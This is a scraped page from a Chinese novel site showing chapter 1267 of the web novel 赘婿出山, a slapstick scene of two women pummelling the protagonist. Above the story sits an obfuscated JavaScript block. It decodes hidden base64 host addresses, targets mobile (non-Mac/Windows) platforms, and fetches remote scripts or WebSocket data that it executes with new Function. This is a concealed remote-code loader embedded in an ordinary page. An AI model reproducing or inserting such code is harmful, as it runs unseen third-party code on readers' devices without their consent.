笔趣阁

字:
关灯 护眼
笔趣阁 > 赘婿出山 > 1267章 谋杀亲夫
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

1267章 谋杀亲夫

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
  他当着余美琳的面称呼董曦和康馨媳妇,余美琳却没有任何反应。也倒是的,楼上还有两个,她要是个个都去反应,她恐怕会得神经衰弱症。在这个奇怪的家里,她不就是那个最奇怪的人吗?如果她不需要用爱发的电,这个家又怎么会变成现在这个样子,重度阴盛阳衰。
  还好是大师,换作是别的男人,坟头上的草恐怕都几尺高了。
  “大叔,我想起来了,我之前去杂物间看过,里面有一把木工锯,我去拿过来。”康馨说去就去,不等李子安答应就往门口走,真要去拿木工锯。
  李子安慌忙伸手拉住她,心头无语,却又不好责备她,只是说了一句:“那个就不必了,你们准备一下吧,准备好了就开始了。”
  “我们早就准备好了。”董曦说。
  “大叔,你准备好了吗?你准备好了,我们就可以动手了。”说完的时候,康馨撞了一下拳头,自适应战衣下的肱二头肌发酵馒头似的鼓了起来,略带点稚气的娃娃脸上是一副迫不及待的表情。
  李子安的心中莫名生出了一丝悲凉。
  你们就这样着急想谋杀亲夫?
  就算是潘金莲,人家好歹也给大郎哥熬了一碗药吧?更为难得的是,人家潘金莲还是坐在床榻,一勺一勺喂大郎哥喝下去的。大郎哥蹬腿不蹬腿,这事放一边不说,就说这个过程,那却是温馨的,大郎哥的心里也是感动的。
  余美琳坐在了最前面的一只4D体感沙发上,淡淡地道:“准备好了就动手吧,然后抬出去埋了。”
  李子安:“……”
  就天下国女王这么一句话的时间,康馨的体型已经暴增了起码三分之一,浑身的肌肉将自适应战衣撑得满满的,清晰可见肌肉的形状,甚至是增粗的血管也暴露无遗。
  她真的像是360个冷笑话号里面的女版哪吒。
  董曦没有什么变化,只是身上的气场变了,明显感觉她在积蓄力量。
  李子安心中叹了一口气:“罢了,来吧。”
  他的话音刚落,距离他最近的金刚哪吒的钵大的拳头就抽在了他的小腹上。
  砰!
  李子安顺着康馨的拳头飞了出去,那一刹那间的冲击力把他的小腹搅得翻江倒海一般难受,差点没把晚上吃的食物给吐出来。
  却不等他飞多远,董曦一跃而起,一米多长的大长腿飞踢过来,一脚踢在了他的背上,他跟着又往康馨的方向飞去。
  这一次,他没多疼,因为天纱主动释放出了菌丝,护住了他的身体。
  这边厢的康馨也是一跃而起,一招庐山升龙霸轰向了李子安的胸膛。
  还真别说,不管是师太还是金账将军,这姐妹俩打自家男人那是舍得下手,一出手就是大招,还真是往死里打,一点都不心疼。
  这一次,康馨的庐山升龙霸眼见抽在李子安小腹上的时候,李子安忽然叫了一声:“等一下!”
  可是康馨没有收手,还是抽了上去。
  李子安在空中侧身,一把抓住了康馨的右手手腕,与她一起掉落在了地上。
  双脚落地,康馨不满地道:“大叔,你耍赖,说了是我们打你,你不能还手,你还手了。”
  李子安的脸上露出了苦涩的笑容:“你别着急,先听我把话说完。”他指了一下身上蔓延开的菌丝,“天纱的菌丝能主动防御,我穿着它,你们打我没什么效果,会把你们累坏的。”
  这就是大师说话的艺术,你看,你们争先恐后地把我往死里打,我这边还在考虑会把你们累到,我这么贴心的男人,你们上哪去找?
  “施主,你把天纱脱了吧。”董曦说。
  李子安也不在乎什么,心念一动,抓住身上的天纱往外一拉。
  天纱离体而去,飘飘飞向了一只4D体感沙发,然后落在了沙发上。
  影音室里多了一个坦荡的君子。
  “呸!”康馨轻轻啐了一口,金刚娃娃脸上多了一抹红晕。
  董曦双掌合十,神色肃穆轻念了一句:“天道昭昭,红尘是苦,色本空空,空空是色。”
  这是原创吗?
  李子安的心里忽然冒出了这样一个奇怪的念头。
  突然,师太和金账将军扑上了上来。
  一秒钟之后,一条一米多长的大长腿踢在了他的胸膛上。
  一只钵大的拳头打在了他的背上。
  大师吐出了舌头。
  砰砰砰!
  砰砰砰……
  拳出如风,腿出如龙。
  天下国的女王捂住了眼睛。
  真的是太惨了……
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师